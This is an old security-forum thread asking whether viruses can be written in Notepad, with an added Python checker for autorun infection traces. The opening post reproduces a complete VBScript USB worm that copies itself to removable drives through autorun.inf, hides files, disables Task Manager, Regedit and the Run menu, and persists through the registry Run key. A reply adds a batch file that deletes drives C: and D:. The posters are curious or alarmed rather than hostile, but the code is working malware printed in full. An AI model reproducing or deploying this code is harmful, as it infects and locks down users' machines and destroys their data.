Author Topic: can we really make a virus on notepad?  (Read 79285 times)

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
can we really make a virus on notepad?
« on: September 18, 2007, 01:25:18 AM »
hi, got this on indonesian forum (and it's in indonesian language too) :
the instruction is : just copy-paste this code to "notepad" and "save as"

'//–Start of the code; set so that when an Error occurs it is ignored and the virus then continues its activity–//
on error resume next

'//–Dim the following words–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,sial,nt,check,sd

‘//–Set a text that will later be used to create the Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe 51AL.doc.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy itself to become the parent file in the Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\51AL.doc.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\51AL.doc.vbs “)
tf.attributes = 39

‘//–Create Autorun.inf to run the virus automatically every time a flash disk is plugged in–//
‘Spread to every drive of type 1 and 2 (removable), including floppy disks
for each flashdrive in fs.drives
‘//–Check Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Create the Infector if the Drivetype turns out to be 1 or 2. Or A:\–//
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\51AL.doc.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\51AL.doc.vbs “)
tf.attributes = 39

‘//–Create the Autorun.inf whose text was prepared earlier (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Registry Manipulation–//
set sial = createobject(”WScript.Shell”)
‘//–Manip - Change the Internet Explorer CAPTION to THE EMperOR of 51AL//
sial.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE EMperOR of 51AL “

‘//–Manip – Set so that hidden files are not shown in Explorer–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0″, “REG_DWORD”

‘//–Manip – Remove the Find, Folder Options and Run menus, and block Regedit and Task Manager–//
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1″, “REG_DWORD”
sial.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable right-click–//
sial.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1″, “REG_DWORD”

‘//–Manip - Show a Message at Every Windows Startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“THE EMperOR of 51AL.”
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“51AL datang......51AL lihat.......51AL menang!!!!”

‘//–Manip – Active at every Windows Startup–//
sial.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\51AL.doc.vbs “

‘//–Manip – Change RegisteredOwner and Organization–//
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Emperor”
sial.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”51AL”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘End of the Code


 ???  ???  ???  ???  ??? can it be done? this is scary.

Ganda
« Last Edit: September 18, 2007, 01:28:26 AM by ganda »
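
For readers who want to check a USB stick or a user profile for the traces the script above would leave, here is an added example (not part of the original thread or any poster's code). It flags `autorun.inf` launch entries that point at a script host or a double-extension script, and lists which of the lock-down policy values named in the post are set. The function names, the sample strings and the input dictionary are assumptions made for this illustration.

```python
import re

# Programs and extensions an autorun entry on removable media should not launch.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")
LAUNCH_KEYS = re.compile(r"^(open|shellexecute|shell\\[^=]*\\command)$", re.I)
DOUBLE_EXT = re.compile(r"\.(doc|txt|jpg|pdf|xls)\.(vbs|vbe|js|bat|cmd|exe|scr)\b", re.I)

# Policy value names the posted script sets to 1 (taken from the post).
LOCKDOWN_VALUES = {"DisableTaskMgr", "DisableRegistryTools", "NoRun",
                   "NoFind", "NoFolderOptions", "NoViewContextMenu"}

# Constructed samples: the autorun text the script builds, and a benign file.
SAMPLE_INFECTED = "[autorun]\r\nshellexecute=wscript.exe 51AL.doc.vbs\r\n"
SAMPLE_BENIGN = "[autorun]\nicon=setup.ico\nlabel=Backup\n"


def audit_autorun(text):
    """Return (key, command, reasons) for suspicious launch entries in [autorun]."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, command = (part.strip() for part in line.partition("="))
        if not LAUNCH_KEYS.match(key):
            continue
        tokens = [t.strip('"') for t in command.lower().split()]
        reasons = []
        if tokens and tokens[0].rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            reasons.append("script-host")
        if any(t.endswith(SCRIPT_EXTS) for t in tokens):
            reasons.append("script-target")
        if DOUBLE_EXT.search(command):
            reasons.append("double-extension")
        if reasons:
            findings.append((key.lower(), command, reasons))
    return findings


def audit_policies(values):
    """values maps policy value names to data; return the lock-down values set to 1."""
    return sorted(n for n, d in values.items()
                  if n in LOCKDOWN_VALUES and str(d) == "1")
```

`audit_policies` expects a dictionary of value names and data that you have already exported from the user's `Policies\Explorer` and `Policies\System` keys; the block itself does not read the registry.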

Offline gordon

  • Comodo's Hero
  • *****
  • Posts: 251
Re: can we really make a virus on notepad?
« Reply #1 on: September 18, 2007, 08:33:20 AM »
And this is supposed to do what ?
thanks a lot for the great documentation ..

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #2 on: September 18, 2007, 10:03:47 AM »
i don't know. the instruction is :
"if you wanna create a virus on notepad, it's easy. just copy-paste this code (don't forget to activate your AV, AVG can detect it, but McAfee didn't)".

and followed by the code.... bla bla bla bla,

and last, "save as this code and name it something.vbs" (i forgot the exact name).

the actual code is too long, i think it's automatically cut off in this post.


Offline aladinonl

  • Comodo's Hero
  • *****
  • Posts: 331
Re: can we really make a virus on notepad?
« Reply #3 on: September 18, 2007, 12:12:25 PM »
i think the code should b in English if ur OS is in English.

since the code is in Indonesian, I suppose the writer aim at Indonesian OS version or at least the OS which got installed Bahasa Indonesian.

Im blind in programming so just my 2c.
small minds discuss people, normal minds discuss events, great minds discuss ideas

Offline eXPerience

  • Left the Forums
  • Comodo's Hero
  • *****
  • Posts: 6958
  • Free Forever !
Re: can we really make a virus on notepad?
« Reply #4 on: September 18, 2007, 02:19:58 PM »
Quote
can we really make a virus on notepad?

Yep we can :P.
The easiest one is this one.

[at]echo off

DEL C: -Y
DEL D: -Y

Save this as 'whateveryouwant'.bat

As you can see it just deletes your hard drive, it can be made more difficult etc so you cant see it, and it can be attached to thing etc but I'm not going to say more 'cous they're going to think that I made that latest virus  ;) lol.
This is all I know of batmaking  :-\.

Hope I didn't scare you to much lol
Xan

Offline Justin L.

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 3110
Re: can we really make a virus on notepad?
« Reply #5 on: September 18, 2007, 03:30:57 PM »
Hello,

Yes it is possible to create simple viruses in notepad or any text editor for that matter.

Justin
Windows 8 64-bit; Intel Core i3 2350 [at] 2.30 GHz w/ 6GB RAM
CIS 6.1.276867.2813 - Complete

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #6 on: September 18, 2007, 08:54:14 PM »
wow! i didn't know that before. i'm not a techie but i'm really interested in virus/av programming, i've bought  books about virus & antivirus programming, (haven't read it yet), but they're all about visual basic virus/AV programming.

Quote
Yep we can :P.
The easiest one is this one.

 [ at ] echo off

DEL C: -Y
DEL D: -Y

Save this as 'whateveryouwant'.bat

As you can see it just deletes your hard drive, it can be made more difficult etc so you cant see it, and it can be attached to thing etc but I'm not going to say more 'cous they're going to think that I made that latest virus  ;) lol.
This is all I know of batmaking  :-\.

Hope I didn't scare you to much lol
Xan

WOW!!! i AM afraid.

Quote
Hello,

Yes it is possible to create simple viruses in notepad or any text editor for that matter.

Justin

and can this "simple text editor virus" be removed by our AV? or it's classified as new virus (zero day)?

 

Offline gordon

  • Comodo's Hero
  • *****
  • Posts: 251
Re: can we really make a virus on notepad?
« Reply #7 on: September 19, 2007, 07:40:05 AM »
That is not a virus, it's just a nasty bat-file .
also, the original example is actually a .vbs-script and you can write those
in any text-editor..but just because it does something nasty doesn't necessarily make it a virus .

here's a .txt "virus" ..
(it doesn't DO anything, read about it here : http://www.eicar.org/anti_virus_test_file.htm)
Code:
X5O!P%[at]AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #8 on: September 19, 2007, 07:45:47 PM »
Quote
That is not a virus, it's just a nasty bat-file .
also, the original example is actually a .vbs-script and you can write those
in any text-editor..but just because it does something nasty doesn't necessarily make it a virus .

here's a .txt "virus" ..
(it doesn't DO anything, read about it here : http://www.eicar.org/anti_virus_test_file.htm)
Code:
X5O!P% [ at ] AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

SCARIER!! if we can really attach it to another file, make it invisible, and it's not categorized as a virus (AV can't detects it) it freaks me!

Quote
Important note: EICAR cannot be held responsible when these files or your AV scanner in combination with these files cause any damage to your computer. YOU DOWNLOAD THESE FILES AT YOUR OWN RISK. Download these files only if you are sufficiently secure in the usage of your AV scanner. EICAR cannot and will not provide any help to remove these files from your computer. Please contact the manufacturer/vendor of your AV scanner to seek such help.

that scares me too ;D

Ganda

Offline eXPerience

  • Left the Forums
  • Comodo's Hero
  • *****
  • Posts: 6958
  • Free Forever !
Re: can we really make a virus on notepad?
« Reply #9 on: September 20, 2007, 01:35:11 AM »
Quote
can it be done? this is scary.
Quote
WOW!!! i AM afraid.
Quote
SCARIER!! if we can really attach it to another file, make it invisible, and it's not categorized as a virus (AV can't detects it) it freaks me!
Quote
that scares me too

LOL looks like you're 'scaried'  ;) ;) ;) ;D ;D ;D

Offline ganda

  • thermodynamic defier
  • Comodo's Hero
  • *****
  • Posts: 5894
Re: can we really make a virus on notepad?
« Reply #10 on: September 20, 2007, 01:45:32 AM »
LOL ;D ;D ;D

Offline gordon

  • Comodo's Hero
  • *****
  • Posts: 251
Re: can we really make a virus on notepad?
« Reply #11 on: September 20, 2007, 10:20:21 AM »
to the moderators :
could you please fix the board-software so it doesn't mess with the formatting
of text that is in "code"-format ? f.ex you can not use the "[at]" symbol (see my point?)

Good that people are afraid .. makes it easier for the AV-manufacturers to get
to your hard-earned cash ..
The number one reason for virus-infections is still people double-clicking on
executable files originating from an evil source and/or using a m$ OS with the default settings .

soyabeaner

  • Guest
Re: can we really make a virus on notepad?
« Reply #12 on: September 20, 2007, 05:36:50 PM »
Quote
to the moderators :
could you please fix the board-software so it doesn't mess with the formatting
of text that is in "code"-format ? f.ex you can not use the " [ at ] " symbol (see my point?)

Well, some of us did change it so you can use the at symbol, but I think the admins wanted to leave it this way to help prevent spambots from harvesting emails in the forum.

Offline Japo

  • Autonomous Human
  • Comodo's Hero
  • *****
  • Posts: 1773
  • Life starts every day anew. Prospects not so good.
Re: can we really make a virus on notepad?
« Reply #13 on: September 20, 2007, 07:53:35 PM »
I think he means skipping that only for text within "code" BB tags, while leave it working otherwise.
Windows users do not disable UAC

soyabeaner

  • Guest
Re: can we really make a virus on notepad?
« Reply #14 on: September 20, 2007, 07:55:44 PM »
I see.  I would also like that, but I don't know if even the admins can control that due to the SMF being maintained by another party.  We can only hope (that and a slew of other forum requests) :THNK

Edit: I see that someone actually thought of a workaround to generate the @ symbol :): you have to type [at-bypass ] --> ignore the last space in there; it was put there ∴ the @ wouldn't be generated.
« Last Edit: September 20, 2007, 08:05:21 PM by Soya Lv. 3 »

 
